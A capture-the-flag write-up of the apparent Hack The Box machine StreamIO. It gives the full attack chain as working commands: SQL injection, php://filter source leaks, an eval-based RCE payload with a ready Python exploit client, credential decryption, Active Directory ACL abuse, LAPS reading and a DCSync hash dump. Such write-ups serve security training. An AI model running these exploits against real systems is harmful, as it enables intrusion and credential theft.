Basic information
Port scan. The target is a Windows domain machine:
```
$ nmap -sC -sV 10.10.11.158
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-13 15:35 CST
Nmap scan report for 10.10.11.158
Host is up (0.19s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-06-13 14:37:27Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
443/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
| ssl-cert: Subject: commonName=streamIO/countryName=EU
| Subject Alternative Name: DNS:streamIO.htb, DNS:watch.streamIO.htb
| Not valid before: 2022-02-22T07:03:28
|_Not valid after:  2022-03-24T07:03:28
| tls-alpn:
|_  http/1.1
|_http-server-header: Microsoft-HTTPAPI/2.0
|_ssl-date: 2022-06-13T14:38:21+00:00; +7h00m01s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2022-06-13T14:37:43
|_  start_date: N/A
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 160.82 seconds
```
Port 80 serves the default IIS page.
Port 443, watch.streamIO.htb: the certificate's Subject Alternative Name lists streamIO.htb and watch.streamIO.htb, so the hostnames come straight from the scan. Add them to /etc/hosts and browse to them. Note that the certificate had already expired at scan time (not valid after 2022-03-24), so every client used against this host needs certificate verification turned off:

```
10.10.11.158 watch.streamIO.htb
```

Port 443, streamIO.htb
SQL injection on streamIO.htb: the login form is injectable. The injection is slow, but it eventually yields password hashes, and cracking one gives a valid login (the two trailing dots are part of the password):

```
sqlmap -r login.txt --force-ssl
# the password includes the two trailing dots
yoshihide : 66boysandgirls..
```
admin: the admin panel (/admin/) has a handful of functions selected by query parameter. Fuzzing the parameter name with a wordlist turns up one more, debug:

```
https://streamio.htb/admin/?user=
https://streamio.htb/admin/?staff=
https://streamio.htb/admin/?movie=
https://streamio.htb/admin/?message=
# wordlist used for the parameter name
SecLists/Fuzzing/fuzz-Bo0oM.txt
```

debug: the value of debug is handed to a PHP include, so PHP stream wrappers work in it. The php://filter wrapper with convert.base64-encode returns a file's source as base64 instead of executing it, which leaks the database credentials out of index.php:

```
https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=index.php
$connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" => 'B1@hx31234567890');
```

master: further fuzzing finds master.php. Its last block runs eval(file_get_contents($_POST['include'])) for any include value other than the literal "index.php", so a data:// URI carrying PHP code is read by file_get_contents and executed by eval. Include master.php through debug, send the data:// URI as the include POST parameter, and pass the command in cmd:

```
include=data://text/plain;base64,c3lzdGVtKCRfR0VUWydjbWQnXSk7
# the base64 decodes to: system($_GET['cmd']);
POST https://streamio.htb/admin/?debug=master.php&cmd=whoami
```
master.php (the target's own code, as recovered through php://filter; the sinks are marked with comments):

```php
<h1>Movie managment</h1>
<?php
if (!defined('included'))
	die("Only accessable through includes");
if (isset($_POST['movie_id']))
{
// $_POST['movie_id'] is concatenated straight into the statement (SQL injection)
$query = "delete from movies where id = ".$_POST['movie_id'];
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
}
$query = "select * from movies order by movie";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
while($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC))
{
?>
<div>
	<div class="form-control" style="height: 3rem;">
		<h4 style="float:left;"><?php echo $row['movie']; ?></h4>
		<div style="float:right;padding-right: 25px;">
			<form method="POST" action="?movie=">
				<input type="hidden" name="movie_id" value="<?php echo $row['id']; ?>">
				<input type="submit" class="btn btn-sm btn-primary" value="Delete">
			</form>
		</div>
	</div>
</div>
<?php
}
?>
<br><hr><br>
<h1>Staff managment</h1>
<?php
if (!defined('included'))
	die("Only accessable through includes");
$query = "select * from users where is_staff = 1 ";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
if (isset($_POST['staff_id']))
{
?>
<div class="alert alert-success"> Message sent to administrator</div>
<?php
}
$query = "select * from users where is_staff = 1";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
while($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC))
{
?>
<div>
	<div class="form-control" style="height: 3rem;">
		<h4 style="float:left;"><?php echo $row['username']; ?></h4>
		<div style="float:right;padding-right: 25px;">
			<form method="POST">
				<input type="hidden" name="staff_id" value="<?php echo $row['id']; ?>">
				<input type="submit" class="btn btn-sm btn-primary" value="Delete">
			</form>
		</div>
	</div>
</div>
<?php
}
?>
<br><hr><br>
<h1>User managment</h1>
<?php
if (!defined('included'))
	die("Only accessable through includes");
if (isset($_POST['user_id']))
{
// same pattern: $_POST['user_id'] unescaped in the statement
$query = "delete from users where is_staff = 0 and id = ".$_POST['user_id'];
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
}
$query = "select * from users where is_staff = 0";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
while($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC))
{
?>
<div>
	<div class="form-control" style="height: 3rem;">
		<h4 style="float:left;"><?php echo $row['username']; ?></h4>
		<div style="float:right;padding-right: 25px;">
			<form method="POST">
				<input type="hidden" name="user_id" value="<?php echo $row['id']; ?>">
				<input type="submit" class="btn btn-sm btn-primary" value="Delete">
			</form>
		</div>
	</div>
</div>
<?php
}
?>
<br><hr><br>
<form method="POST">
<input name="include" hidden>
</form>
<?php
if (isset($_POST['include']))
{
// only the literal "index.php" is refused; anything else (a data:// URI, a
// local file, a remote URL) is fetched by file_get_contents and passed to eval
if ($_POST['include'] !== "index.php")
	eval(file_get_contents($_POST['include']));
else
	echo(" ---- ERROR ---- ");
}
?>
```
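The two steps above (source disclosure through php://filter, then code execution through master.php's eval) can be driven from one small client. This is an added example, not code from the original write-up: the parameter names debug, include and cmd, the data:// payload and the php://filter wrapper are the ones on the page; the session-cookie handling and the SESSION_COOKIE placeholder are assumptions, since the admin panel requires the yoshihide login obtained earlier.

```python
"""Client for the StreamIO admin ?debug= include chain.

Added example, not code from the original write-up. Parameter names (debug,
include, cmd) and the payloads come from the page; SESSION_COOKIE and the
cookie-based login handling are assumptions.
"""
import base64
import re
import ssl
import urllib.parse
import urllib.request
from typing import Dict, Optional, Tuple

BASE = "https://streamio.htb/admin/"
# Assumption: the admin panel is only reachable with a logged-in session; copy
# the real cookie from the browser after logging in as yoshihide.
SESSION_COOKIE = "PHPSESSID=replace-me"

# The certificate in the nmap output expired on 2022-03-24, so a verifying
# client refuses to connect (the reason sqlmap needed --force-ssl as well).
_CTX = ssl.create_default_context()
_CTX.check_hostname = False
_CTX.verify_mode = ssl.CERT_NONE


def filter_url(resource: str) -> str:
    """URL that makes the include return a file's source as base64 instead of running it."""
    wrapper = f"php://filter/convert.base64-encode/resource={resource}"
    return BASE + "?" + urllib.parse.urlencode({"debug": wrapper})


def extract_source(html: str) -> str:
    """Pull the base64 blob the filter wrapper embedded in the page and decode it.

    The admin page wraps the blob in its own HTML, so take the longest run of
    base64 characters; the page's own words never reach 16 characters.
    """
    runs = re.findall(r"[A-Za-z0-9+/]{16,}={0,2}", html)
    if not runs:
        raise ValueError("no base64 blob in response")
    blob = max(runs, key=len)
    blob += "=" * (-len(blob) % 4)  # tolerate stripped padding
    return base64.b64decode(blob).decode("utf-8", "replace")


def rce_request(cmd: str, php: str = "system($_GET['cmd']);") -> Tuple[str, Dict[str, str]]:
    """Build the request that reaches eval(file_get_contents($_POST['include'])).

    master.php only refuses include == "index.php", so a data:// URI passes the
    check; file_get_contents returns the PHP inside the URI and eval runs it.
    The command rides in ?cmd= and is read by the injected system() call.
    """
    b64 = base64.b64encode(php.encode()).decode()
    url = BASE + "?" + urllib.parse.urlencode({"debug": "master.php", "cmd": cmd})
    return url, {"include": f"data://text/plain;base64,{b64}"}


def fetch(url: str, data: Optional[Dict[str, str]] = None) -> str:
    """Send the request with the session cookie; POST when form data is given."""
    body = urllib.parse.urlencode(data).encode() if data else None
    req = urllib.request.Request(url, data=body, headers={"Cookie": SESSION_COOKIE})
    with urllib.request.urlopen(req, context=_CTX, timeout=20) as resp:
        return resp.read().decode("utf-8", "replace")


# Constructed response for offline testing: what the filter wrapper returns for
# a file that contains just "<?php die();" (base64 PD9waHAgZGllKCk7).
SAMPLE_FILTER_RESPONSE = "<html><body><h1>Admin</h1>PD9waHAgZGllKCk7</body></html>"


if __name__ == "__main__":
    print(extract_source(fetch(filter_url("index.php"))))  # leaks $connection
    url, data = rce_request("whoami")
    print(fetch(url, data))  # command output is echoed into the response body
```

extract_source is deliberately lenient about padding because the base64 lands inside HTML that may be trimmed by the page template; rce_request keeps the PHP payload as an argument so the same function serves a reverse-shell one-liner later.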
reverse shell: generate the callback command with msf and get a meterpreter session; it makes the following steps easier.
portfwd 1433: the database credentials were already recovered from index.php. Port 1433 is not reachable from outside (it was among the filtered ports in the scan), so forward it through the meterpreter session to the target's loopback:

```
portfwd add -l 1433 -p 1433 -r 127.0.0.1
$connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" => 'B1@hx31234567890');
```

backup: besides STREAMIO, the server holds a streamio_backup database. Its users table contains an entry for nikk37, which is also an account on the machine:

```
id  username  password                           (cracked)
1   nikk37    389d14cb8e4e9b94b137deb1caf0612a   get_dem_girls2@yahoo.com
```
The hash was resolved to its plaintext with an online lookup. On a real engagement crack it offline instead, so that data taken from the target is not handed to a third party.
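The offline equivalent of that lookup, as an added example that is not part of the original write-up: the dumped hash and the recovered password are the ones on the page; the candidate list is constructed here in place of a real wordlist, and unsalted MD5 (32 hex characters, no salt column in the dump) is the assumption the check verifies.

```python
"""Offline crack of the streamio_backup hash. Added example, not from the
write-up; the hash and password are the page's, the wordlist is constructed."""
import hashlib
from typing import Dict, Iterable, Optional

# From the users table of streamio_backup (page above).
DUMPED = {"nikk37": "389d14cb8e4e9b94b137deb1caf0612a"}

# Constructed candidate list standing in for a real wordlist such as rockyou.txt.
WORDLIST = ["password", "nikk37", "Password1!", "get_dem_girls2@yahoo.com", "letmein"]


def md5_hex(word: str) -> str:
    # Assumption: the application stored unsalted MD5 of the password.
    return hashlib.md5(word.encode("utf-8")).hexdigest()


def crack_all(hashes: Dict[str, str], words: Iterable[str]) -> Dict[str, Optional[str]]:
    """Hash each candidate once and look it up against every target hash.

    Returns user -> plaintext (or None when the wordlist did not contain it),
    so the cost is one hash per candidate regardless of how many targets.
    """
    wanted = {h.lower(): user for user, h in hashes.items()}
    found: Dict[str, Optional[str]] = {user: None for user in hashes}
    for w in words:
        user = wanted.get(md5_hex(w))
        if user is not None and found[user] is None:
            found[user] = w
    return found


if __name__ == "__main__":
    for user, plain in crack_all(DUMPED, WORDLIST).items():
        print(f"{user}: {plain if plain is not None else '<not in wordlist>'}")
```

The wordlist can be any iterator, so a file handle (`open("rockyou.txt", errors="ignore")`) drops in without loading it into memory; strip the newline from each line before hashing.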
user flag: log in with those credentials for the user flag.
stream.htb is also added to hosts here, since it is used as the WinRM target name:

```
10.10.11.158 watch.streamIO.htb streamIO.htb stream.htb
evil-winrm -i stream.htb -u nikk37 -p "get_dem_girls2@yahoo.com"
```
Privilege escalation information
firefox: Firefox is installed on the machine. Copy key4.db and logins.json out of nikk37's profile and decrypt the saved logins with firepwd. The password saved for admin, JDg0dd1s@d0p3cr3@t0r, is what authenticates as the domain user JDgodd in the next step:

```
C:\Users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release\
  key4.db
  logins.json

python3 firepwd/firepwd.py
decrypting login/password pairs
https://slack.streamio.htb:b'admin',b'JDg0dd1s@d0p3cr3@t0r'
https://slack.streamio.htb:b'nikk37',b'n1kk1sd0p3t00:)'
https://slack.streamio.htb:b'yoshihide',b'paddpadd@12'
https://slack.streamio.htb:b'JDgodd',b'password@12'
```
bloodhound: collect the domain data with BloodHound; it shows a path from JDgodd to Administrator:

```
bloodhound-python -u nikk37 -ns 10.10.11.158 -d streamio.htb -c All
```
Privilege escalation
core staff: according to BloodHound, JDgodd has WriteOwner over the Core Staff group, and Core Staff is allowed to read the LAPS password of the DC, so the first step is to put JDgodd into Core Staff. WriteOwner on its own does not permit editing the group's DACL; the usual chain is to take ownership of the object first (PowerView's Set-DomainObjectOwner), because the owner implicitly holds WRITE_DAC, and only then grant rights with Add-DomainObjectAcl (which defaults to -Rights All) and add the member:

```powershell
upload PowerView.ps1
Import-Module .\PowerView.ps1
$SecPassword = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('streamio\JDgodd', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Core Staff" -PrincipalIdentity "streamio\JDgodd"
Add-DomainGroupMember -Identity "Core Staff" -Members "streamio\JDgodd" -Credential $Cred
```
laps password: JDgodd can now read the LAPS-managed local Administrator password of the DC:

```
sudo apt install lapsdumper
lapsdumper -u JDgodd -p 'JDg0dd1s@d0p3cr3@t0r' -d streamio.htb
DC$:j50th8dNh2($Ae
```

The same value can be read from the PowerShell session instead: ms-Mcs-AdmPwd is just an LDAP attribute on the computer object, protected only by its ACL, and Get-ADComputer returns it once the caller is allowed to read it:

```powershell
$Computers = Get-ADComputer -Credential $Cred -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$Computers | Sort-Object ms-Mcs-AdmPwdExpirationTime | Format-Table -AutoSize Name, DnsHostName, ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime

Name DnsHostName     ms-Mcs-AdmPwd  ms-Mcs-AdmPwdExpirationTime
---- -----------     -------------  ---------------------------
DC   DC.streamIO.htb j50th8dNh2($Ae 132997693606874315
```
root flag: the LAPS password is the DC's local Administrator password; the flag is on Martin's desktop:

```
evil-winrm -i streamio.htb -u Administrator -p 'j50th8dNh2($Ae'
```

hash: with Administrator access, dump the domain NTLM hashes over DCSync:

```
impacket-secretsdump -just-dc-ntlm Administrator@10.10.11.158
Administrator:500:aad3b435b51404eeaad3b435b51404ee:45be1d36942e3eb589e8b0d372198f3d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5f5142aae3cce656285ce4504605dec1:::
JDgodd:1104:aad3b435b51404eeaad3b435b51404ee:8846130392c4169cb552fe5b73b046af:::
Martin:1105:aad3b435b51404eeaad3b435b51404ee:a9347432fb0034dd1814ca794793d377:::
nikk37:1106:aad3b435b51404eeaad3b435b51404ee:17a54d09dd09920420a6cb9b78534764:::
yoshihide:1107:aad3b435b51404eeaad3b435b51404ee:6d21f46be3697ba16b6edef7b3399bf4:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:fac45a493cb064a17fabefae8d723613:::
```
Last updated: 2022-09-19 08:53:20